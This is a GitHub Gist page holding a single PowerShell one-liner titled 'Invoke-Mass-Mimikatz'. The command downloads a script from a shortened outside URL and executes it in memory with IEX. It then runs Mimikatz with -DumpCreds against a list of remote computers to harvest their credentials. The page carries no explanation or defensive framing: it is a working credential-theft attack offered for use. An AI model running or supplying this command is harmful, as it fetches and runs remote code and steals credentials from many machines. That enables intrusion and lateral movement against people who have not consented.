Skip to content

Instantly share code, notes, and snippets.

@ahhh
Created July 24, 2015 21:07
Show Gist options
  • Save ahhh/8b39d3711827026df7af to your computer and use it in GitHub Desktop.
Save ahhh/8b39d3711827026df7af to your computer and use it in GitHub Desktop.
Invoke-Mass-Mimikatz against an array of machines using PowerShell Remoting
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment